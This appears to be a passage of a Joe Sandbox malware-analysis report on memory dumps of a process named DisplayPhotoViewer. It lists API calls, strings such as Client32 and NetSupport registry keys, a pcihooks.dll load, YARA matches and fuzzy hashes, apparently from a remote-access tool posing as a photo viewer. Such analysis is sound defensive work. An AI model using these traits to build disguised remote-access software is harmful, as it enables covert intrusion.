• GetStringTypeA.KERNEL32(?,?,?,?), ref: 1070DBE5
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: StringType$ByteCharMultiWide
• String ID:
• API String ID: 3852931651-0
                                                                                                    APIs
                                                                                                    • GetStringTypeW.KERNEL32(00000001,10710274,00000001,?,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 107091DA
                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,10710270,00000001,?,?,?,10704A40,?), ref: 107091F4
                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 10709228
                                                                                                    • MultiByteToWideChar.KERNEL32(?,10723E49,?,00000000,00000000,00000000,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 10709260
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 107092B6
                                                                                                    • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 107092C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852931651-0
                                                                                                    • Opcode ID: 30fc01270a3abbcfb70f884a820b4b9877740a0ddb67db40c1db4654fb035b56
                                                                                                    • Instruction ID: 5eaf57bb4d7bad166b3e664ca775d0a8d47d3e3b64daa3f2e3aa016fbf969f31
                                                                                                    • Opcode Fuzzy Hash: 30fc01270a3abbcfb70f884a820b4b9877740a0ddb67db40c1db4654fb035b56
                                                                                                    • Instruction Fuzzy Hash: F0415972A0021AFFCB118FA4CC89EDE7BB8FB0A750F108625F911E61A4D3759950DBE0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 1103F4E5
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • Written %u bytes to smartcard device, xrefs: 1103F4D6
                                                                                                    • Error %d writing to smartcard device, xrefs: 1103F4EC
                                                                                                    • NO VALID SMARTCARD DEVICE!!!, xrefs: 1103F4FB
                                                                                                    • CLTCONN.CPP, xrefs: 1103F4C0
                                                                                                    • transferred == datalen, xrefs: 1103F4C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                                                                    • String ID: CLTCONN.CPP$Error %d writing to smartcard device$NO VALID SMARTCARD DEVICE!!!$Written %u bytes to smartcard device$transferred == datalen
                                                                                                    • API String ID: 73808336-3603962039
                                                                                                    • Opcode ID: 026eac08d3d47c65733b0a11513d21157319761bd4aef06d5eeb67f15cea7c04
                                                                                                    • Instruction ID: 6850c08d80bef832d9d96e9b64f2b7ad70ab8db26dbd1ba0f3b9449ed812c6cc
                                                                                                    • Opcode Fuzzy Hash: 026eac08d3d47c65733b0a11513d21157319761bd4aef06d5eeb67f15cea7c04
                                                                                                    • Instruction Fuzzy Hash: 0621F5B5905509ABDB00CF95DC41FDEB764EB91725F004269FC6467380DB307A44CAA2
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10705FFC
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706007
                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706014
                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706030
                                                                                                    • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,?,10705CC9,10705D1D,?,?,?), ref: 10706051
                                                                                                    • HeapDestroy.KERNEL32(?,?,10705CC9,10705D1D,?,?,?), ref: 10706063
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$HeapVirtual$Destroy
                                                                                                    • String ID:
                                                                                                    • API String ID: 716807051-0
                                                                                                    • Opcode ID: e982bcdad80726918e2b34c931088d70cb88babe8152c1b18760d56d7f467aef
                                                                                                    • Instruction ID: 63104b8d68fb288420de1122586ad6dbf969489095f6ba07cc200215d45010fd
                                                                                                    • Opcode Fuzzy Hash: e982bcdad80726918e2b34c931088d70cb88babe8152c1b18760d56d7f467aef
                                                                                                    • Instruction Fuzzy Hash: 4D113C35680225EBD7229F14DC85F06B7A5FB4D750F328158F640671A8C6B2AC069F58
                                                                                                    APIs
                                                                                                      • Part of subcall function 11083B10: _memset.LIBCMT ref: 11083B2F
                                                                                                      • Part of subcall function 11083B10: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
                                                                                                    • _memset.LIBCMT ref: 11083512
                                                                                                    • _free.LIBCMT ref: 110835C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$CriticalInitializeSection_free
                                                                                                    • String ID: ..\CTL32\EncryptFuncs.cpp$1 + (int) strlen(pszEnc64) < maxlen$pDES
                                                                                                    • API String ID: 1034327355-3728095610
                                                                                                    • Opcode ID: ee79224c9f9f2d50c736650042d09290cd17f7cd8ff6f16355ae4f183240f354
                                                                                                    • Instruction ID: 6075f93dac07e3b9ff52bbbf3461db84779f0e8cee520564eb9c04fa52d763a4
                                                                                                    • Opcode Fuzzy Hash: ee79224c9f9f2d50c736650042d09290cd17f7cd8ff6f16355ae4f183240f354
                                                                                                    • Instruction Fuzzy Hash: 7A41E875E042599BDB14DF24CC81FEEB7B4FB84714F408594E955AB280EF30BA458BE0
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(00000000,00000000,00000000,1102BF72,TermUI...), ref: 1113382A
                                                                                                    • KillTimer.USER32(00000000,00007F2D,00000000,1102BF72,TermUI...), ref: 11133847
                                                                                                    • FreeLibrary.KERNEL32(75B40000,?,00000000,1102BF72,TermUI...), ref: 111338BD
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,1102BF72,TermUI...), ref: 111338D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                    • String ID: TermUI
                                                                                                    • API String ID: 2006562601-4085834059
                                                                                                    • Opcode ID: a42b0379d892b21400b9a6640724abd10ec8f0b26e7538fd00b08548e9dc3a1f
                                                                                                    • Instruction ID: 3e8b4f24f8d7cf2f96131d2e66af77bc80e8e610ebfdef7ce392803a22a66c50
                                                                                                    • Opcode Fuzzy Hash: a42b0379d892b21400b9a6640724abd10ec8f0b26e7538fd00b08548e9dc3a1f
                                                                                                    • Instruction Fuzzy Hash: 6341A1B5A666309FD202DFD5D9C4A6EFBA9FB89B1CB104269F421C3B48D730A401CF95
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32 ref: 10705E3E
                                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 10705E73
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10705ED3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                    • API String ID: 1385375860-4131005785
                                                                                                    • Opcode ID: 6d8b23cefda49418071d09c37c7237526d23dabc7d11ca24aaaa773f5bd9bb75
                                                                                                    • Instruction ID: 44fadfe32f3a263012582d278c29a17ea5ff03423a091c7cfce0352a606037b6
                                                                                                    • Opcode Fuzzy Hash: 6d8b23cefda49418071d09c37c7237526d23dabc7d11ca24aaaa773f5bd9bb75
                                                                                                    • Instruction Fuzzy Hash: 38311875901299AEEB228670AC95BCF37E8DB07380F1402D5E185DE049E634BFC9CB11
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 11055A10
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 11055A6F
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 11055AE1
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 11055AEE
                                                                                                    Strings
                                                                                                    • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 110559C9, 11055A04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumValue$CloseOpen
                                                                                                    • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                                    • API String ID: 3785232357-4133889954
                                                                                                    • Opcode ID: a215f1bed0227b9061d558d6eb7b4b90d51f6f3bd0c8e022dda0509cfc66014b
                                                                                                    • Instruction ID: 17682a4840668cd6e4519ac14c881411bd496a39583594207744b313f48c7cb6
                                                                                                    • Opcode Fuzzy Hash: a215f1bed0227b9061d558d6eb7b4b90d51f6f3bd0c8e022dda0509cfc66014b
                                                                                                    • Instruction Fuzzy Hash: 8A415672E112299FEB55CF54CC91FEAB3B8AB49704F4041E9E60DE7180EA715A44CF61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID: %s: $DISPLAYPHOTOVIEWER
                                                                                                    • API String ID: 4139908857-1826084258
                                                                                                    • Opcode ID: 75b4f354d761b22b05d3727a3963c4de94f987d3ee6b41d65b23fcfba9aa57bd
                                                                                                    • Instruction ID: 15e2053daecc66cd620e45fb8f2b5ea00e478d70cc9849b26e907824ef66b7bb
                                                                                                    • Opcode Fuzzy Hash: 75b4f354d761b22b05d3727a3963c4de94f987d3ee6b41d65b23fcfba9aa57bd
                                                                                                    • Instruction Fuzzy Hash: 3541183490155A9BCB11CFA8DC58BFAFBA4FF8531AF0082A5D81597248EB309649CF84
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 110D7AD4
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D7AE9
                                                                                                      • Part of subcall function 11009170: std::_Xinvalid_argument.LIBCPMT ref: 110091E5
                                                                                                      • Part of subcall function 11009170: _memmove.LIBCMT ref: 11009236
                                                                                                    Strings
                                                                                                    • Invalid Passcode, xrefs: 110D7A65
                                                                                                    • Your system/device requires approval by the service before you can access it fully, xrefs: 110D7AA7
                                                                                                    • The version of the software you are running is not supported by the service, xrefs: 110D7A86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8ThrowXinvalid_argument_malloc_memmove_memsetstd::_std::exception::exceptionwsprintf
                                                                                                    • String ID: Invalid Passcode$The version of the software you are running is not supported by the service$Your system/device requires approval by the service before you can access it fully
                                                                                                    • API String ID: 390219819-299493402
                                                                                                    • Opcode ID: a55439e3ab79e5897cdd568946cb6677d5bfa9ddee7e2a6ea06021f0c6593b1d
                                                                                                    • Instruction ID: edeb43edfc7dbdf1b46ad59295ab5e9cb7c333a6879943ce7133d4d149fdccfb
                                                                                                    • Opcode Fuzzy Hash: a55439e3ab79e5897cdd568946cb6677d5bfa9ddee7e2a6ea06021f0c6593b1d
                                                                                                    • Instruction Fuzzy Hash: 244162B5A0470AAFDB00CF95C844BDAFBF8FB58314F10465EE51997680EB74AA04CBA1
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(pcihooks.dll), ref: 1103F146
                                                                                                    • GetProcAddress.KERNEL32(00000000,Monitor), ref: 1103F15B
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1103F173
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Monitor$pcihooks.dll
                                                                                                    • API String ID: 145871493-549663706
                                                                                                    • Opcode ID: 093e91ea3ca7f1def94de2ed1c0f325e58571dd87db5dff8c62930ec2a556a57
                                                                                                    • Instruction ID: d3856a6d142c8d79d849abc4956bcb9cb73575ea9b986ccaadf67eb30c7dedbd
                                                                                                    • Opcode Fuzzy Hash: 093e91ea3ca7f1def94de2ed1c0f325e58571dd87db5dff8c62930ec2a556a57
                                                                                                    • Instruction Fuzzy Hash: 8331C274E00659EFCB15DFA4D880BAEBBF9FF49304F00825DE81593294EB34AA41CB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strncpy$wsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 2895084632-1363028141
                                                                                                    • Opcode ID: c2c3b66c73fafed31db78f2435bf9bf84fb5b9a23884d068094f50acaf10809c
                                                                                                    • Instruction ID: acd263fff2a6e0b3c162b1e8cc8d923715b6e880cb15e02d2131be6b7f5fb9c2
                                                                                                    • Opcode Fuzzy Hash: c2c3b66c73fafed31db78f2435bf9bf84fb5b9a23884d068094f50acaf10809c
                                                                                                    • Instruction Fuzzy Hash: EF31DF76A00B02AFC350DF65C980AA3B7E9FF89358B40491DE94A87E00E731F456CBA1
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 11073509
                                                                                                    • SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11073535
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 110735A9
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ExitProcess$ClientErrorInvalidateLastMessage_strrchrwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2435669796-1557312927
                                                                                                    • Opcode ID: 7c0718ed2863bea0efd09e84297aa100aab8c2802427eb35c5828cd842dee2d0
                                                                                                    • Instruction ID: f223430b13d80b1fe6c9bb097dbf9c0922efbcd5502a01a5398dbd2d0fe0ac9a
                                                                                                    • Opcode Fuzzy Hash: 7c0718ed2863bea0efd09e84297aa100aab8c2802427eb35c5828cd842dee2d0
                                                                                                    • Instruction Fuzzy Hash: C821D875A0021AEFD710DF54CC81FEFF3A9EB88304F10C219F945AB280E770AA458B91
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 1113B5F0
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1113B654
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                    • API String ID: 47109696-3245241687
                                                                                                    • Opcode ID: d560cc61fc2140d18da63f4b3bf0ea2305538077f776507ffaf68adc1f38225d
                                                                                                    • Instruction ID: 9220f0a519618d912ae8205e62b5c3bfe3d4f9f01e79e904e9a989c8c0a7d550
                                                                                                    • Opcode Fuzzy Hash: d560cc61fc2140d18da63f4b3bf0ea2305538077f776507ffaf68adc1f38225d
                                                                                                    • Instruction Fuzzy Hash: DC21FD75D1021A9BE721DA54CC80F9EF779BB84324F0041AAD81DF3284F631DD458BA5
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 111394BB
                                                                                                    • _strrchr.LIBCMT ref: 111394CA
                                                                                                    • _strrchr.LIBCMT ref: 111394DA
                                                                                                    • wsprintfA.USER32 ref: 111394F5
                                                                                                      • Part of subcall function 1113B8F0: GetModuleHandleA.KERNEL32(NSMTRACE,11189A50), ref: 1113B90A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                    • String ID: DISPLAYPHOTOVIEWER
                                                                                                    • API String ID: 2529650285-4210178995
                                                                                                    • Opcode ID: a36aeec8292e28b4d6fa9e931b8b9dfd306e8882dc1da4460dc61d5ecb7f935e
                                                                                                    • Instruction ID: 20e770adcf3bf3bc5ada956c1a830714f045b09d8597fdc4b668ee0269ba9269
                                                                                                    • Opcode Fuzzy Hash: a36aeec8292e28b4d6fa9e931b8b9dfd306e8882dc1da4460dc61d5ecb7f935e
                                                                                                    • Instruction Fuzzy Hash: 9D219530A5129C4FEB12CB348A447EAFBA19B8232CF0000D9DC868B285FA709984C3A1
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(00000000,00000001), ref: 110498AC
                                                                                                      • Part of subcall function 110359A0: wsprintfA.USER32 ref: 11035A0E
                                                                                                      • Part of subcall function 110359A0: SetDlgItemTextA.USER32(?,?,?), ref: 11035ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
